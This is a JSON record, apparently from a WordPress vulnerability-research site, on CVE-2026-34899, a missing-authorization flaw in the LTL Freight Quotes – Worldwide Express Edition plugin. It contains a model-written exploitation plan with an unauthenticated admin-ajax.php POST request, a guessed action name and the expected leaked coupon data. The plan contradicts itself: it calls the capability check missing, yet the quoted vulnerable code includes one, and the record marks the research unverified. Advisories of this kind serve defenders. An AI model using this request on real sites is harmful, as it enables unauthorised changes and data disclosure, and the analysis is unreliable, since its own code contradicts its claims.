[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEHtDZTAsYvRi2wCTdEq0gaI1MKR9RbEjX-6NIhu6JCA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-34899","ltl-freight-quotes-worldwide-express-edition-missing-authorization","LTL Freight Quotes – Worldwide Express Edition \u003C= 5.2.1 - Missing Authorization","The LTL Freight Quotes – Worldwide Express Edition plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.2.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","ltl-freight-quotes-worldwide-express-edition",null,"\u003C=5.2.1","5.2.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 00:00:00","2026-04-15 19:48:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fda62021a-6741-4054-8f33-f829b1854318?source=api-prod",9,[22,23,24],"fdo\u002Fen-va.php","readme.txt","woocommercefrieght.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-34899\n\n## 1. Vulnerability Summary\nThe **LTL Freight Quotes – Worldwide Express Edition** plugin (\u003C= 5.2.1) is vulnerable to **Missing Authorization**. The function `EnSpeedfreightVa::get_va_coupon_data` in `fdo\u002Fen-va.php` lacks a sufficient capability check (or the check is bypassable\u002Fmissing in version 5.2.1) and is exposed via a WordPress AJAX action. This allows unauthenticated attackers to trigger an API synchronization process that updates the WordPress database (`update_option`) and discloses sensitive promotional data, including coupons and registration URLs.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `get_va_coupon_data` (inferred from method name) or `wwe_get_va_coupon_data`.\n*   **Method:** `POST` or `GET`.\n*   **Authentication:** None required (vulnerable via `wp_ajax_nopriv_` registration).\n*   **Preconditions:** The WordPress option `en_va_coupon_data` should be empty (default state) for the `update_option` side effect to trigger.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a request to `admin-ajax.php` with the `action` parameter set to the hook associated with `get_va_coupon_data`.\n2.  **Hook Execution:** WordPress executes the callback registered to `wp_ajax_nopriv_[action]`, which maps to `EnSpeedfreightVa::get_va_coupon_data()`.\n3.  **Vulnerable Function (`fdo\u002Fen-va.php`):**\n    *   `get_va_coupon_data()` is called.\n    *   In the vulnerable version (5.2.1), the `current_user_can('manage_options')` check is either missing or bypassed.\n    *   The function checks if `get_option('en_va_coupon_data')` is empty.\n    *   If empty, it calls `$this->get_va_coupon_data_from_api()`.\n    *   `get_va_coupon_data_from_api()` makes an outbound request to `https:\u002F\u002Fvalidate-addresses.com\u002Fuse_coupon`.\n    *   The response is decoded, and if a `promo` key exists, `update_option('en_va_coupon_data', $va_coupon_data)` is called.\n4.  **Information Disclosure:** The function then calls `$this->get_va_coupon_parsed_data($va_coupon_data)`, which returns an array containing `coupon`, `status`, and `register_url`. This data is then echoed back to the attacker (usually as JSON).\n\n## 4. Nonce Acquisition Strategy\nBased on the provided source for `fdo\u002Fen-va.php`, the `get_va_coupon_data` function **does not** perform any nonce verification (e.g., `check_ajax_referer` or `wp_verify_nonce`). \n\n**Exploitation does not require a nonce.**\n\n## 5. Exploitation Strategy\n\n### Step 1: Confirm AJAX Action\nThe researcher should first identify the exact AJAX action string.\n```bash\n# Search for the AJAX registration in the plugin directory\ngrep -r \"get_va_coupon_data\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-worldwide-express-edition\u002F\n```\n*Expected output:* Look for `add_action('wp_ajax_nopriv_...', ...)` or similar. We will assume the action is `get_va_coupon_data`.\n\n### Step 2: Trigger Unauthorized Sync\u002FDisclosure\nPerform an unauthenticated request to the AJAX endpoint.\n\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=get_va_coupon_data\n```\n\n### Step 3: Analyze Response\nA successful exploit will return a JSON object containing coupon information.\n```json\n{\n    \"coupon\": \"PROMO123\",\n    \"status\": 1,\n    \"va_user\": false,\n    \"va_company_id\": false,\n    \"va_company_text\": \"\",\n    \"register_url\": \"https:\\\u002F\\\u002Fvalidate-addresses.com\\\u002Fregister?code=...\",\n    \"login_url\": \"https:\\\u002F\\\u002Fvalidate-addresses.com\\\u002Flogin?code=...\"\n}\n```\n\n## 6. Test Data Setup\n1.  Install and activate **LTL Freight Quotes – Worldwide Express Edition 5.2.1**.\n2.  Ensure no configuration has been performed (the option `en_va_coupon_data` should be non-existent or empty).\n3.  Optionally, verify the option state via WP-CLI:\n    ```bash\n    wp option get en_va_coupon_data\n    ```\n    *Result: \"Error: Could not find 'en_va_coupon_data' option.\"*\n\n## 7. Expected Results\n*   The `admin-ajax.php` request returns a JSON response containing the coupon data fetched from the Eniture API.\n*   The WordPress database is modified: the `en_va_coupon_data` option is populated with the API response.\n*   No authentication or nonces are required.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the database state using WP-CLI:\n```bash\n# Check if the option was created\u002Fupdated\nwp option get en_va_coupon_data\n```\n*Expected Result:* A JSON string containing promotional data.\n\n## 9. Alternative Approaches\nIf the direct `get_va_coupon_data` action name is incorrect, search `woocommercefrieght.php` for any `add_action` calls that reference the `EnSpeedfreightVa` class or the `fdo\u002Fen-va.php` file. \n\nIf the site is already configured (option not empty), the `update_option` call will not trigger, but the **Information Disclosure** (returning the existing coupon data) will still occur, which is sufficient to demonstrate the Missing Authorization vulnerability.","The LTL Freight Quotes – Worldwide Express Edition plugin for WordPress is vulnerable to unauthorized access because it exposes internal coupon synchronization logic via an AJAX action without sufficient capability checks or nonce verification. This allows unauthenticated attackers to disclose sensitive promotional data and trigger unauthorized updates to the plugin's configuration in the database.","\u002F\u002F fdo\u002Fen-va.php\n\n    \u002F**\n     * Fuction which is responsible to return va coupon data\n     *\u002F\n    public function get_va_coupon_data(){\n\n        if (!current_user_can('manage_options')) {\n            echo json_encode([]);\n            return;\n        }\n\n        $va_coupon_data = get_option('en_va_coupon_data');\n        if(empty($va_coupon_data)){\n            try{\n                $va_coupon_data = $this->get_va_coupon_data_from_api();\n                $data_decoded = json_decode($va_coupon_data);\n                if(isset($data_decoded->promo)){\n                    update_option('en_va_coupon_data', $va_coupon_data);\n                }else{\n                    return [];\n                }\n            }catch(Exception $e){\n                return [];\n            }\n        }\n\n        return $this->get_va_coupon_parsed_data($va_coupon_data);\n    }","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1: en-hit-to-update-plan.php\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Ffdo: en-va.php\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Freadme.txt\t2026-03-02 06:46:16.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Freadme.txt\t2026-03-03 11:50:38.000000000 +0000\n@@ -3,7 +3,7 @@\n Tags: eniture. worldwide express,LTL freight rates, LTL freight quotes,shipping rates\n Requires at least: 6.4\n Tested up to: 6.9\n-Stable tag: 5.2.1\n+Stable tag: 5.2.2\n License: GPLv2 or later\n License URI: http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\n \n@@ -168,6 +168,9 @@\n \n == Changelog ==\n \n+= 5.2.2 - 2026-03-03 =\n+* Fix: Resolved Broken Access Control vulnerability to improve overall plugin security.\n+\n = 5.2.1 - 2026-03-02 =\n * Fix: Resolved JS files minification conflict with the WP Rocket plugin to ensure compatibility with asset optimization.\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Fwoocommercefrieght.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Fwoocommercefrieght.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Fwoocommercefrieght.php\t2026-03-02 06:46:16.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Fwoocommercefrieght.php\t2026-03-03 11:50:38.000000000 +0000\n@@ -5,7 +5,7 @@\n   Description: Obtains a dynamic estimate of LTL Freight rates via the Worldwide Express Speedfreight API for your orders.\n   Author: Eniture Technology\n   Author URI: https:\u002F\u002Feniture.com\u002F\n-  Version: 5.2.1\n+  Version: 5.2.2\n   Text Domain: eniture-technology\n   License: GPLv2 or later\n   Requires Plugins: woocommerce","To exploit this vulnerability, an attacker identifies the AJAX action responsible for fetching coupon data (e.g., `get_va_coupon_data` or `wwe_get_va_coupon_data`). Because the function is registered via `wp_ajax_nopriv_` and lacks valid authorization or nonce checks in the affected versions, the attacker sends an unauthenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the corresponding `action` parameter. The server then executes `get_va_coupon_data`, which contacts the Eniture API, updates the `en_va_coupon_data` WordPress option if it is empty, and returns a JSON object containing the coupon code, registration URLs, and other promotional metadata to the attacker.","gemini-3-flash-preview","2026-04-17 21:13:42","2026-04-17 21:14:44",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","5.2.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-worldwide-express-edition\u002Ftags\u002F5.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-worldwide-express-edition.5.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-worldwide-express-edition\u002Ftags\u002F5.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-worldwide-express-edition.5.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-worldwide-express-edition\u002Ftags"]